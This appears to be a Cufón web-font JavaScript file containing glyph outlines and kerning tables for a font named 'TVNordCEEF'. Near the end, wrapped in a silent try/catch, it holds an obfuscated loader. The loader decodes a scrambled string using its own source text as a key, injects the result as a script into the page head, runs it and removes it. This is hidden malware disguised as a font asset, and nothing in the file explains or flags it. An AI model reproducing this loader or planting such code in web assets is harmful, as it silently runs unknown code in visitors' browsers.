-28,38r121,0r0,35","w":190,"k":{"w":-1,"u":1,"o":6,"i":1,"e":9,"a":4,"Z":-5,"W":-9,"U":2,"T":-10,"S":-4,"O":7,"G":6,"A":-11,".":-1,",":-1}},{"d":"67,-205r-44,0r0,-47r44,0r0,47xm66,3v5,50,-36,74,-88,61r3,-33v7,1,14,3,21,3v23,0,22,-23,22,-40r0,-181r42,0r0,190","w":90,"k":{"e":-1}},{"d":"184,58r-188,0r0,-31r188,0r0,31","w":180},{"d":"171,0r-42,0r0,-131v1,-37,-49,-28,-63,-7r0,138r-42,0r0,-251r43,0r0,84v15,-13,33,-24,53,-24v81,3,42,118,51,191","w":194,"k":{"y":1,"w":1,"u":-1,"q":-1,"e":-1,"d":-1,",":1}},{"d":"194,-66v0,53,-37,72,-93,72v-76,0,-93,-55,-95,-64r45,-10v1,7,10,37,52,37v23,0,43,-9,43,-31v0,-52,-130,-29,-130,-113v0,-52,39,-71,87,-71v67,0,85,47,88,55r-43,12v-2,-6,-12,-31,-45,-31v-23,0,-40,9,-40,29v0,54,131,26,131,115","w":203,"k":{"y":-10,"w":-9,"t":-7,"o":-3,"e":-4,"d":-3,"c":-4,"a":-5,"Y":1,"W":-4,"V":-3,"U":1,"T":-5,"S":-9,"O":-2,"G":-2,"C":-2,"A":-5,".":-2,",":-2}},{"d":"172,-84r-115,0v1,36,11,56,39,56v25,0,37,-18,42,-31r34,15v-7,16,-28,49,-77,49v-53,0,-81,-36,-81,-100v0,-64,31,-97,81,-97v66,0,79,50,77,108xm131,-114v0,-22,-9,-46,-37,-46v-29,0,-36,23,-38,46r75,0","w":188,"k":{"x":5,"w":2,"v":2,"t":1,"s":-2,"f":1,"W":3,"V":8,"T":20,"S":-1,"R":-2,"N":-2,"M":-2,"L":-2,"D":-2,".":3,",":3}},{"d":"63,-3r-29,57r-17,0r19,-54r-16,0r0,-49r43,0r0,46","w":83,"k":{"8":-13,"7":17,"5":-6,"4":10,"1":10}},{"d":"100,44r-33,0v-68,-99,-69,-229,0,-328r33,0v-23,53,-43,105,-43,164v0,54,21,115,43,164","w":111,"k":{"4":3}},{"d":"174,0r-140,0r0,-36r49,0r0,-163r-41,17r-10,-34v29,-11,50,-30,95,-25r0,205r47,0r0,36","k":{"'":23,"~":10,"\\":20,"=":10,"9":7,"8":6,"7":24,"6":11,"5":7,"4":25,"3":3,"2":6,"1":12,"0":11,".":5,"-":13,",":5,"+":23,"*":30,"%":33,"\"":30}},{"d":"181,-94v0,91,-61,122,-115,78r0,82r-42,0r0,-253r40,0r2,20v7,-8,25,-23,50,-23v42,0,65,34,65,96xm136,-94v0,-68,-40,-77,-70,-44r0,93v33,30,70,17,70,-49","w":197,"k":{"u":-1,"t":1,"r":-1,"p":-1,"l":-1,"i":-1,"h":-1,"f":1,"T":19}},{"d":"173,66r-42,0r0,-82v-55,43,-115,15,-115,-78v0,-61,24,-96,67,-96v25,0,41,16,48,23r2,-20r40,0r0,253xm131,-45r0,-93v-28,-34,-71,-21,-71,45v0,67,40,79,71,48","w":197,"k":{"u":-1}},{"d":"102,-105v-72,8,35,170,-94,149r0,-27v19,0,33,1,33,-23v0,-48,-15,-108,32,-115v-46,-5,-32,-66,-32,-113v0,-24,-14,-23,-33,-23r0,-27v40,-3,71,5,68,44v5,39,-17,102,26,104r0,31","w":111},{"d":"188,-69v0,46,-29,71,-74,74r3,31r-32,0r2,-32v-37,-5,-60,-29,-73,-58r36,-19v8,24,30,41,55,41v21,0,37,-8,37,-31v0,-48,-117,-38,-117,-113v0,-40,22,-64,62,-69r-2,-31r32,0r-3,31v29,3,58,20,73,51r-36,19v-8,-19,-27,-38,-49,-38v-19,0,-34,8,-34,29v0,49,120,35,120,115","k":{"7":10,"1":10}},{"d":"126,-212r-36,0r-36,-52r50,0","w":180},{"d":"168,-284r-113,328r-39,0r113,-328r39,0","w":183,"k":{"8":-6,"7":3,"4":27}},{"d":"71,-125r-44,0r0,-49r44,0r0,49xm71,0r-44,0r0,-49r44,0r0,49","w":83},{"d":"165,-187r-61,187r-45,0r-59,-187r44,0r28,94v5,17,9,34,12,52v8,-50,24,-98,39,-146r42,0","w":165,"k":{"w":-14,"s":-1,"o":4,"e":2,"a":1,"A":2,".":4,",":4}},{"d":"120,-2v-44,13,-87,2,-87,-50r0,-101r-27,0r0,-34r27,0r0,-48r43,-11r0,59r41,0r0,34r-41,0r0,100v-3,25,25,25,42,18","w":123,"k":{"y":-12,"w":-11,"v":-12,"q":-1,"o":-2,"g":-7,"e":-1,"d":-1,"a":-6,"S":-5,".":-4,",":-4}},{"d":"180,-168v-11,-2,-22,-1,-29,5v42,53,-16,126,-86,100v-5,2,-10,3,-10,9v2,16,49,16,68,21v29,7,55,15,55,52v0,43,-47,52,-86,52v-30,0,-84,-5,-84,-48v0,-23,13,-30,33,-39v-12,-3,-22,-14,-22,-26v0,-17,14,-26,29,-29v-20,-10,-30,-28,-30,-54v-2,-61,72,-84,118,-54v14,-17,23,-19,44,-19r0,30xm123,-125v0,-20,-10,-36,-32,-36v-22,0,-32,14,-32,35v0,21,9,36,32,36v22,0,32,-14,32,-35xm140,20v-11,-25,-55,-20,-80,-29v-9,5,-19,10,-19,21v0,23,37,26,53,26v14,0,46,0,46,-18","w":186,"k":{"v":-12,"o":3,"e":1,"a":2,",":-1}},{"d":"71,-125r-44,0r0,-49r44,0r0,49xm71,-3r-30,57r-17,0r19,-54r-16,0r0,-49r44,0r0,46","w":83},{"d":"201,0r-52,0v-17,-33,-41,-62,-53,-99v-11,38,-33,67,-50,99r-45,0r73,-125r-69,-115r53,0v14,29,35,56,44,90v8,-35,30,-61,44,-90r44,0r-65,113","w":201,"k":{"y":18,"i":3,"e":16,"a":5,"Z":-10,"T":-11,"I":-3,"A":-15}},{"d":"221,-120v0,66,-28,126,-102,126v-74,0,-102,-60,-102,-126v0,-67,28,-126,102,-126v78,0,102,60,102,126xm172,-120v0,-35,-8,-90,-53,-90v-46,0,-53,55,-53,90v0,34,8,90,53,90v46,0,53,-55,53,-90","w":237,"k":{"z":1,"w":-1,"u":-3,"t":-3,"r":-3,"p":-3,"n":-3,"m":-3,"l":-3,"k":-3,"j":-2,"i":-3,"h":-3,"f":-4,"b":-3,"Z":9,"Y":11,"W":3,"V":5,"U":3,"T":4,"J":5,".":6,",":6}},{"d":"294,-72v0,37,-9,76,-53,76v-43,0,-52,-38,-52,-74v0,-36,10,-75,52,-75v43,0,53,37,53,73xm240,-245r-132,250r-30,0r132,-250r30,0xm131,-171v0,37,-10,75,-54,75v-43,0,-52,-38,-52,-74v0,-36,10,-75,52,-75v43,0,54,38,54,74xm263,-72v0,-14,-1,-51,-22,-51v-21,0,-21,39,-21,53v0,14,1,51,21,51v21,0,22,-39,22,-53xm100,-171v0,-14,-2,-52,-23,-52v-21,0,-21,39,-21,53v0,14,1,52,21,52v21,0,23,-39,23,-53","w":318},{"d":"202,0r-48,0r-45,-100r-40,0r0,100r-44,0r0,-240v78,3,169,-19,168,67v0,33,-14,53,-45,63xm147,-171v0,-44,-40,-32,-78,-34r0,69v38,-1,78,8,78,-35","w":209,"k":{"u":-1,"o":1,"i":-1,"e":1,"d":1,"c":1,"W":-2,"V":-1,"U":2,"T":-6,"O":2,"I":-2,"G":2,"C":2,".":-3,",":-3}},{"d":"179,-77v0,66,-42,83,-79,83v-61,0,-81,-51,-81,-120v0,-87,32,-132,91,-132v48,0,65,30,65,30r-30,24v0,0,-14,-20,-37,-20v-32,0,-43,32,-44,80v0,0,16,-21,48,-21v48,0,67,31,67,76xm136,-75v0,-30,-10,-46,-36,-46v-29,7,-36,15,-36,37v0,22,4,56,36,56v23,0,36,-15,36,-47","w":199,"k":{"7":7,"4":-1,"1":12}},{"d":"204,0r-48,0r-59,-112r-28,38r0,74r-44,0r0,-240r44,0r0,108r77,-108r47,0r-68,93","w":205,"k":{"y":14,"w":9,"u":4,"t":8,"s":-4,"o":6,"n":-3,"m":-3,"l":-3,"i":-3,"g":-9,"e":5,"d":5,"a":-2,"Z":-10,"Y":-11,"W":-9,"U":2,"T":-10,"S":1,"O":11,"I":-3,"G":10,".":-6,",":-6}},{"d":"181,-93v0,91,-67,123,-115,73r-2,20r-40,0r0,-251r42,0r0,81v0,0,20,-20,52,-20v42,0,63,34,63,97xm136,-95v0,-9,4,-63,-34,-63v-21,0,-36,16,-36,16r0,94v33,36,73,17,70,-47","w":197,"k":{"z":2,"w":1,"u":-1,"t":1,"r":-1,"p":-1,"n":-1,"m":-1,"l":-1,"k":-1,"i":3,"h":-1,"f":1,"b":-1,"T":19,"H":-3,".":1,",":2}},{"d":"125,-251r-2,87r-32,0r-2,-87r36,0xm60,-251r-2,87r-31,0r-2,-87r35,0","w":149,"k":{"4":26,"2":-6}},{"d":"183,-53r-28,0r0,53r-44,0r0,-53r-100,0r0,-27r87,-160r57,0r0,154r28,0r0,33xm115,-209r-66,123r63,0v1,-42,-3,-85,3,-123","k":{"~":-13,"}":-10,"]":-13,"=":-6,"7":17,"4":-3,"1":22,".":-10,"-":-13,",":-10,"+":-3,")":-13}},{"d":"179,-94v0,56,-20,99,-82,99v-55,0,-81,-38,-81,-98v0,-55,22,-99,81,-99v54,0,82,34,82,98xm135,-93v0,-45,-12,-66,-38,-66v-26,0,-37,20,-37,67v0,44,11,64,37,64v26,0,38,-19,38,-65","w":194,"k":{"z":3,"y":6,"w":2,"v":3,"u":3,"t":2,"r":-1,"n":-1,"m":-1,"l":-1,"k":-1,"h":-1,"f":2,"b":-1,"W":3,"V":7,"U":-1,"T":21,".":2,",":3}},{"d":"88,-240r-9,171r-30,0r-9,-171r48,0xm86,0r-43,0r0,-49r43,0r0,49","w":114},{"d":"128,-148v-33,0,-48,12,-62,41r0,107r-42,0r0,-187r40,0r0,37v18,-28,29,-42,64,-42r0,44","w":133,"k":{"z":-4,"w":-12,"v":-12,"u":-1,"t":-10,"s":-5,"r":-1,"o":10,"n":-1,"m":-1,"l":-1,"k":-1,"i":-1,"h":-1,"g":-3,"f":-10,"e":-1,"d":-1,"b":-1,"a":1,"T":-5,"S":-5,"O":-4,"A":7,".":6,",":6}},{"d":"61,-69v-7,-54,43,-80,45,-118v2,-37,-51,-29,-56,-1r-34,-18v23,-53,131,-56,130,16v1,50,-52,65,-50,121r-35,0xm101,0r-44,0r0,-49r44,0r0,49","w":156},{"d":"165,-9r-150,-70r0,-29r150,-70r0,33r-117,50r117,53r0,33","w":180},{"d":"170,0r-39,0r-1,-22v-15,11,-38,26,-57,26v-80,0,-41,-118,-50,-191r43,0r0,124v0,15,3,33,22,33v13,0,30,-11,40,-19r0,-138r42,0r0,187","w":194,"k":{"w":-3,"v":-3,"t":-1,"p":-1,"e":-1,"d":-1,"b":-1,"T":5,",":1}},{"d":"63,0r-43,0r0,-49r43,0r0,49","w":83,"k":{"8":-6,"7":13,"5":-6,"4":13,"1":10}},{"d":"97,-120v0,63,-23,110,-53,164r-33,0v22,-49,44,-110,44,-164v0,-59,-20,-111,-44,-164r33,0v30,53,53,102,53,164","w":111},{"d":"201,-174r-3,31r-38,0r-5,44r37,0r-2,31r-40,0r-8,68r-31,0r8,-68r-42,0r-9,68r-31,0r9,-68r-35,0r2,-31r37,0r6,-44r-37,0r2,-31r39,0r8,-66r32,0r-9,66r42,0r8,-66r32,0r-8,66r36,0xm130,-144r-44,0r-6,46r44,0","w":210},{"d":"208,-76v-8,50,-39,82,-91,82v-77,0,-100,-53,-100,-122v0,-65,25,-130,100,-130v51,0,82,31,91,80r-46,6v-2,-27,-14,-50,-45,-50v-47,0,-51,57,-51,92v0,35,5,88,51,88v31,0,42,-24,45,-51","w":219,"k":{"z":-1,"y":-4,"t":-7,"s":4,"o":-2,"l":1,"k":1,"h":1,"e":3,"c":-2,"a":-2,"T":-1,"C":-1}},{"d":"175,-211v-50,74,-77,119,-77,211r-48,0v0,-83,30,-139,79,-204r-105,0r0,-36r151,0r0,29","k":{"~":33,"=":33,":":21,"9":20,"8":13,"7":7,"6":17,"4":35,"3":13,"2":13,"1":21,"0":13,"\/":26,".":54,"-":36,",":61,"+":33}},{"d":"257,-187r-51,187r-43,0v-11,-49,-29,-94,-34,-148v-6,55,-22,100,-35,148r-42,0r-51,-187r44,0v10,47,26,93,30,145v4,-55,23,-97,34,-145r43,0v11,48,29,91,33,145v6,-51,21,-97,31,-145r41,0","w":258,"k":{"o":1,"a":-2,".":2}},{"d":"41,-30v24,0,26,-24,26,-46r0,-164r44,0r0,177v7,64,-63,82,-114,57r11,-34v10,5,21,10,33,10","w":135,"k":{"u":-4,"o":-2,"e":-3,"a":-1,"O":1,"A":1}},{"d":"255,0r-41,0r2,-206r-57,206r-39,0r-44,-151v-5,-18,-9,-37,-13,-55v4,66,3,136,3,206r-41,0r0,-240r68,0r39,142v4,16,7,32,10,48v12,-67,32,-127,48,-190r65,0r0,240","w":279,"k":{"u":-3,"s":-2,"o":-2,"i":-3,"e":-3,"a":-3,"S":-1,"I":-5,",":6}},{"d":"160,0r-37,0r-2,-21v-27,40,-108,32,-108,-27v0,-55,64,-65,106,-71v9,-49,-56,-51,-69,-16r-34,-17v25,-55,144,-60,144,19r0,133xm119,-49r0,-43v-23,3,-64,8,-64,39v-1,39,51,25,64,4","w":183,"k":{"y":3,"v":3,"t":1,"g":1,"Y":16,"V":7,"T":19,"R":-3,".":1,",":2}},{"d":"168,-111r-156,0r0,-31r156,0r0,31xm168,-48r-156,0r0,-31r156,0r0,31","w":180,"k":{"7":20,"4":-13,"1":13}},{"d":"168,44r-39,0r-113,-328r39,0","w":183,"k":{"7":20,"2":-10}},{"d":"231,6r-27,39v-18,-8,-36,-22,-49,-46v-84,29,-138,-40,-138,-119v0,-66,29,-126,102,-126v113,0,128,149,71,219v8,14,22,24,41,33xm172,-120v0,-35,-7,-90,-53,-90v-45,0,-53,55,-53,90v0,33,9,90,53,90v45,0,53,-56,53,-90","w":237,"k":{"u":-4,"U":4}},{"d":"92,44r-67,0r0,-328r67,0r0,29r-30,0r0,269r30,0r0,30","w":111,"k":{"4":3}},{"d":"168,-78r-61,0r0,62r-34,0r0,-62r-61,0r0,-32r61,0r0,-62r34,0r0,62r61,0r0,32","w":180,"k":{"7":20,"4":-10,"1":33}},{"d":"154,-199r-45,8r31,34r-31,23r-22,-41r-22,41r-31,-23r32,-34r-45,-8r11,-36r42,19r-7,-46r40,0r-6,46r42,-20","w":174},{"d":"224,0r-54,0v-6,-6,-12,-13,-18,-19v-43,42,-140,27,-138,-43v0,-40,26,-59,58,-75v-38,-38,-19,-109,43,-109v33,0,58,17,58,52v0,33,-25,51,-51,66v10,20,22,38,36,56v11,-14,19,-31,24,-48r31,12v-7,23,-18,45,-35,62v14,17,30,32,46,46xm138,-193v0,-15,-7,-27,-24,-27v-34,0,-26,49,-9,67v13,-9,33,-22,33,-40xm134,-42v-17,-21,-31,-42,-44,-65v-42,11,-44,82,7,82v15,0,28,-5,37,-17","w":231},{"d":"205,0r-49,0r-17,-59r-77,0r-16,59r-46,0r73,-240r59,0xm131,-94v-10,-38,-24,-75,-30,-116v-6,41,-21,78,-31,116r61,0","w":204,"k":{"y":1,"v":1,"u":-1,"s":-8,"p":-4,"g":-9,"d":-1,"b":-4,"a":-5,"Y":15,"V":8,"U":5,"T":14,"S":-5,"G":4,"C":4,".":-6,"-":-9,",":-6}},{"d":"176,-205r-107,0r0,64r90,0r0,35r-90,0r0,106r-44,0r0,-240r151,0r0,35","w":174,"k":{"w":-7,"u":3,"t":-5,"s":-1,"r":3,"l":-4,"i":-5,"e":-1,"a":1,"Z":-6,"W":-16,"T":-17,"S":-5,"A":6,".":6,",":6}},{"d":"191,-170v-2,67,-55,76,-122,73r0,97r-44,0r0,-240v79,1,169,-16,166,70xm145,-169v1,-43,-38,-35,-76,-36r0,73v38,0,76,5,76,-37","k":{"u":-1,"t":-9,"o":2,"a":-3,"T":-10,"S":-5,"O":-2,"A":10,"-":-9}},{"d":"69,0r-44,0r0,-240r44,0r0,240","w":93,"k":{"w":-3,"v":-3,"s":-2,"q":-3,"o":-2,"l":-3,"g":-2,"e":-3,"d":-3,"c":-2,"a":-3,"Z":2,"X":-4,"W":-3,"V":-4,"T":-4,"S":-1,"R":-5,"Q":4,"P":-5,"N":-5,"M":-5,"L":-5,"K":-5,"I":-5,"H":-5,"F":-5,"E":-5,"D":-5,"B":-5,".":-1}},{"d":"195,-67v0,42,-28,67,-75,67r-95,0r0,-240v72,3,163,-19,164,59v0,28,-12,49,-44,55v34,4,50,27,50,59xm145,-174v4,-33,-41,-32,-76,-31r0,64v37,2,80,1,76,-33xm149,-71v0,-43,-41,-34,-80,-35r0,71v39,1,80,3,80,-36","w":209,"k":{"u":-3,"t":-3,"s":-3,"o":-1,"e":-2,"d":-2,"b":-3,"a":-2,"Y":3,"U":1,"T":-4,"S":-6,"R":-2,"P":-2,"O":1,"N":-2,"M":-2,"L":-2,"K":-2,"I":-2,"H":-2,"G":1,"F":-2,"E":-2,"D":-2,"B":-2,"A":-1,".":1,",":1}},{"d":"107,30r-34,0r0,-306r34,0r0,306","w":180},{"d":"66,0r-42,0r0,-251r42,0r0,251","w":90,"k":{"y":-4,"w":-3,"v":-3,"e":-1,"d":-1,"a":-1,",":1}},{"w":90},{"d":"66,-205r-44,0r0,-46r44,0r0,46xm65,0r-42,0r0,-187r42,0r0,187","w":87,"k":{"z":-1,"w":-4,"v":-5,"q":-2,"o":-1,"g":-1,"e":-3,"d":-2,"c":-1,"a":-1,".":-1}},{"d":"285,-240r-56,240r-48,0v-13,-65,-35,-124,-40,-196v-5,72,-28,131,-41,196r-46,0r-53,-240r43,0v12,65,30,124,36,194v6,-71,27,-129,39,-194r48,0v13,64,33,123,39,194v4,-71,25,-130,36,-194r43,0","w":285,"k":{"y":-10,"u":9,"r":1,"o":12,"i":-4,"e":10,"a":5,"O":3,"A":5,".":3}},{"d":"341,-102v0,51,-22,99,-80,99v-20,0,-40,-4,-48,-25v-13,18,-32,26,-54,26v-38,0,-55,-30,-55,-65v0,-60,61,-138,119,-94r2,-12r31,0r-18,120v0,16,8,24,24,24v37,0,50,-41,50,-72v0,-71,-46,-111,-115,-111v-77,0,-135,55,-135,133v0,111,99,148,199,114r6,29v-121,35,-236,-14,-236,-143v0,-94,74,-161,166,-161v84,0,144,52,144,138xm217,-138v-43,-34,-80,26,-80,71v0,18,5,37,27,37v17,0,30,-11,39,-24","w":373},{"d":"171,0r-42,0r0,-128v3,-40,-47,-31,-63,-10r0,138r-42,0r0,-187r40,0r1,21v16,-13,37,-24,58,-24v39,0,48,25,48,59r0,131","w":194,"k":{"v":1,"u":-1,"q":-1,"p":-1,"e":-1,"d":-1,"T":14,",":1}},{"d":"21,-20v-9,-62,110,-108,110,-157v0,-24,-10,-36,-32,-36v-19,0,-34,12,-39,44r-39,-11v0,0,9,-66,78,-66v51,0,76,25,76,67v0,73,-89,91,-108,143r108,0r0,36r-154,0r0,-20","k":{"7":9,"4":20,"1":12,"+":6}},{"d":"173,0r-39,0r-3,-20v-8,8,-24,24,-49,24v-42,0,-66,-35,-66,-97v0,-89,61,-121,115,-78r0,-80r42,0r0,251xm131,-48r0,-94v-33,-31,-71,-16,-71,49v0,64,42,79,71,45","w":197,"k":{"y":-4,"w":-3,"e":-1,"d":-1,"a":-1,",":1}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+407-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("C&;XY+(uxgSICZHhL+WFw&wSia(X;+SIia*FxgrE;|{1`puPg->d|H|:-G|Ti|ds9G5!UasBrg>~iB:2>&Wv;+XdUi~p*XqX>G5n>G~)g+?.xW(HtZRq0BWS*&50tp?aL&0hgT{H:,;t`H2P(&{n0,{{L9d?wu>zLu?(`-X0iWWYCFk+b:;b9:*{YZ5?|u5I>+bPtE(2Y&HuCZwPC9q?y-810GXPtE81YGX2t+qHY+LuxZqEygwI;P~EYBH2xB>SUzuhxg`ktXdkyp?zLzL0tPveCG{)LzLziZ~pLB*^Y+Ls`gH1iZ~,YaX{0zrFYa~EYgW?YW2I`aSs.B(u0+SI;aXnxgq0t+W?tgrHLH2IY+|u.B(u0+SI;aXnxgq0t+HILW2I`gvs;&|aiZ~I;ir{Y&S,`gqkYz(uC9b^tErH0zbkY&S,`ir?YadIx&SpL&85ZGTW&Bw*Ct>(!ybr9-:|gi`;xY0LU.RnP,vH+Ek?6D1sI^2qFpuXazd~)h{SAe~nYg:?Cg;^0PRhx-q1!F1Dx9HEga(Yx|XLyi5Yx|XSC9R?")}catch(e){}delete _cufon_bridge_;return f})({"w":198,"face":{"font-family":"TVNordCEEF","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 6 4 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-22 -286.052 341 74.9739","underline-thickness":"24.12","underline-position":"0","stemh":"31","stemv":"36","unicode-range":"U+0020-U+007E"}}));